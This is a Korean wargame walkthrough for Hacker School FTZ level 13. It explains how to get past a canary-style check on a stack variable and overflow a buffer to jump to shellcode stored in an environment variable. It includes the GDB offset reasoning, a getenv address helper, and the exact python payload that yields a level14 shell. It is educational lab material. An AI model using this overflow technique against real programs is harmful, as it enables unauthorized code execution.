[Hacker school FTZ] Level13 -> Level14

소스로 봐선 스택구조가 [그림 1]로 추측되는데 Canary(또는 Security Cookie)처럼 Return address변조를 위해서 어쩔 수 없이 덮어 씌워지는 변수 i의 영역의 변화 유무를 검사하여 메인 함수가 종료되기전에 자기 자신에 SIGSEGV(Segmentation Violation) 신호를 보내 종료시킨다.

buf[1024]

i[4]

SFP[4]

RET

[그림 1]

[그림 2]

GDB로 까보면 내부는 [그림 2]와 같다 <main+3>에서 esp를 ebp-1048까지 키우고

ebp-12와 0x1234567을 비교하는걸로 봐선 buf+더미의 크기가 1048-12= 1036byte로 알 수 있다.

변수 i+더미의 크기는.. 아래와 같이 12byte로 확인된다

그러므로 페이로드는 아래와 같이 짜면 되겠다.

[ dummy(1036) | 0x01234567 | dummy(8) | dummy(4) | 쉘코드 주소 ]

쉘코드 주소는 level11과 같이 환경변수에 쉘코드 등록후 환경변수의 주소를 얻어내면 된다.

--풀이--

level11에서 썼던 환경변수sh(NOP+shellcode) 주소 획득

[level13@ftz tmp]$ cat ./t.c

#include <stdio.h>

int main(){

        printf("%#x\n",getenv("sh"));

        return 0;

}

[level13@ftz tmp]$ gcc ./t.c

[level13@ftz tmp]$ ./a.out

0xbffff703

실행

[level13@ftz tmp]$ ../attackme `python -c 'print "A"*1036+"\x67\x45\x23\x01"+"B"*12+"\x03\xf7\xff\xbf"'`

sh-2.05b$ id

uid=3094(level14) gid=3093(level13) groups=3093(level13)

sh-2.05b$ my-pass

TERM environment variable not set.

Level14 Password is "---- ---- ----- -----".